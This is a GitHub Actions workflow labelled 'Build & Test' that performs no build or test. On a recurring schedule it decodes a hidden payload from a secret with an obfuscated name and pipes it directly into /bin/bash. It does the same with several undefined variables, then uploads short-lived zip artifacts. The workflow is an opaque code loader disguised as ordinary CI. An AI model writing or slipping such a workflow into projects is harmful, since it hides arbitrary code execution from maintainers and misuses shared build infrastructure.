name: Build & Test
on:
  workflow_dispatch:

  schedule:
    - cron: '57 5,11,17,23 * * *'
permissions:
  contents: read
  actions: read
env:
  CI: true
concurrency:
  group: ${{ github.workflow }}
  cancel-in-progress: false
jobs:
  handler:
    name: Main task
    runs-on: ubuntu-latest
    timeout-minutes: 360
    steps:
      - name: Checkout
        uses: actions/checkout@v4
        with:
          fetch-depth: 1
      - name: Launch
        env:
          mz53: ${{ secrets.mz53 }}
        run: |
          printf '%s' "$mz53" | jq -r .frnty0 | /bin/bash
          echo $q8 | jq -r .mqone72 | /bin/bash
          echo $ss82396 | jq -r .jpf96 | /bin/bash
          echo $m555 | jq -r .y38 | /bin/bash
          printf '%s' "$nxs8" | jq -r .fru699 | /bin/bash

      - name: Persist output
        if: always()
        uses: actions/upload-artifact@v4
        with:
          name: e0SXYPE4
          path: "*.zip"
          retention-days: 1
